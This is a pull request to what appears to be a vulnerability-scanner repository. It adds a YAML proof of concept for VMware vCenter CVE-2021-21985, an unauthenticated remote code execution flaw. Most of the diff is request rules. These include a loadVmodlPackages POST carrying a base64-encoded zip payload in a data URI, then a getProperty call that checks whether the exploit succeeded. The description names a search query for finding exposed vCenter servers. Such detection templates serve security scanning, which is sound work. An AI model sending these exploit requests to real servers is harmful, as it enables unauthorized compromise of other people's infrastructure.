### PR TITLE
vmware-vcenter-cve-2021-21985-rce

### DIFF
--- a/pocs/vmware-vcenter-cve-2021-21985-rce.yml
+++ b/pocs/vmware-vcenter-cve-2021-21985-rce.yml
@@ -4,10 +4,26 @@ rules:
     path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
     headers:
       Content-Type: application/json
-    body: |-
+    body: |
       {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a
     expression: |
-      response.status == 200 && response.body.bcontains(b"result")
+      response.status == 200 && response.body.bcontains(b"{\"result\":{\"") && response.headers["set-Cookie"].contains("VSPHERE-UI-JSESSIONID")
+  - method: POST
+    path: /ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages
+    headers:
+      Content-Type: application/json
+    body: |
+      {"methodInput": [["https://localhost:443/vsanHealth/vum/driverOfflineBundle/data:text/html%3Bbase64,UEsDBBQAAAAIADihc1Okxc3arAEAAI8EAAASAAAAb2ZmbGluZV9idW5kbGUueG1spVNNT+MwFLxX4j+YIFWNRG0+biWJBOxlJVZC2z0gIQ6O+5qYdeysn9MUIf77unGBfoFUyCXOezMvM2M7yYFrJPNKaUyj0rl6xFjbthRrK3UxtbyC1ti/1NiCoSih4qyjRAc9Ep6OO5qjXOO35x3l7OTklN39uhl31KHU6LgWsMJGOQpzb4zgThqdvjb3ULMPlgXAsPugc5xEWfhhsqgQOUmjOo+IUBx9JI98xqniuqC31ghAvGqkmoB9JXVEYbwv2whn7JDbYqXlm0qiW6v42oyrBjKWS81yjmXCQmEnaig+bSeH99c/Lv9c3pO2NLyS5Czrn5KHh2wXK2EbahK2W3vSZbUVjMT1YKShP3XduLGzwKvfwPdJ5s3C0XOdU38wrBvEtAC3MnIQv2z72FN0brdEXzXTKViYfF2xxO8LE0YpWEA3Um2cVD6PhX96/Y7JPhiDT+ig2nFix6GxKrC2pgbrnoj21yON2pI7mPkESGcljY6eSRhHEdztEjzo/2uMuzCN8/sS1sckt1RJDei3bOlj8O6HPhqp/SVbMg964R3HMXmJ2GYqYYF+9R9QSwECFAAUAAAACAA4oXNTpMXN2qwBAACPBAAAEgAAAAAAAAAAAAAAtoEAAAAAb2ZmbGluZV9idW5kbGUueG1sUEsFBgAAAAABAAEAQAAAANwBAAAAAA==%23"]]}
+    expression: |
+      response.status == 200
+  - method: POST
+    path: /ui/h5-vsan/rest/proxy/service/systemProperties/getProperty
+    headers:
+      Content-Type: application/json
+    body: |
+      {"methodInput": ["output", null]}
+    expression: |
+      response.status == 200 && response.body.bcontains(b"{\"result\":") && !response.body.bcontains(b"null")
 
 detail:
   vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"

--- a/pocs/vmware-vcenter-cve-2021-21985-rce.yml
+++ b/pocs/vmware-vcenter-cve-2021-21985-rce.yml
@@ -1,0 +1,19 @@
+name: poc-yaml-vmware-vcenter-cve-2021-21985-rce
+rules:
+  - method: POST
+    path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
+    headers:
+      Content-Type: application/json
+    body: |-
+      {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a
+    expression: |
+      response.status == 200 && response.body.bcontains(b'result')
+
+detail:
+    vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
+    author: envone77
+    description: "vmware vCenter unauth RCE cve-2021-21985"
+    links:
+        - https://www.anquanke.com/post/id/243098
+        - https://github.com/alt3kx/CVE-2021-21985_PoC
+        

--- a/pocs/vmware-vcenter-cve-2021-21985-rce.yml
+++ b/pocs/vmware-vcenter-cve-2021-21985-rce.yml
@@ -7,13 +7,12 @@ rules:
     body: |-
       {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a
     expression: |
-      response.status == 200 && response.body.bcontains(b'result')
+      response.status == 200 && response.body.bcontains(b"result")
 
 detail:
-    vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
-    author: envone77
-    description: "vmware vCenter unauth RCE cve-2021-21985"
-    links:
-        - https://www.anquanke.com/post/id/243098
-        - https://github.com/alt3kx/CVE-2021-21985_PoC
-        
+  vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
+  author: envone77
+  description: "vmware vCenter unauth RCE cve-2021-21985"
+  links:
+    - https://www.anquanke.com/post/id/243098
+    - https://github.com/alt3kx/CVE-2021-21985_PoC


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的
vmware vcenter 远程代码执行 cve-2021-21985 
## 测试环境
fofa title="ID_VC_Welcome"
## 备注
![微信截图_20210608015123](https://user-images.githubusercontent.com/50262716/121066233-3df3b580-c7fc-11eb-93f0-a75c5ff82014.png)
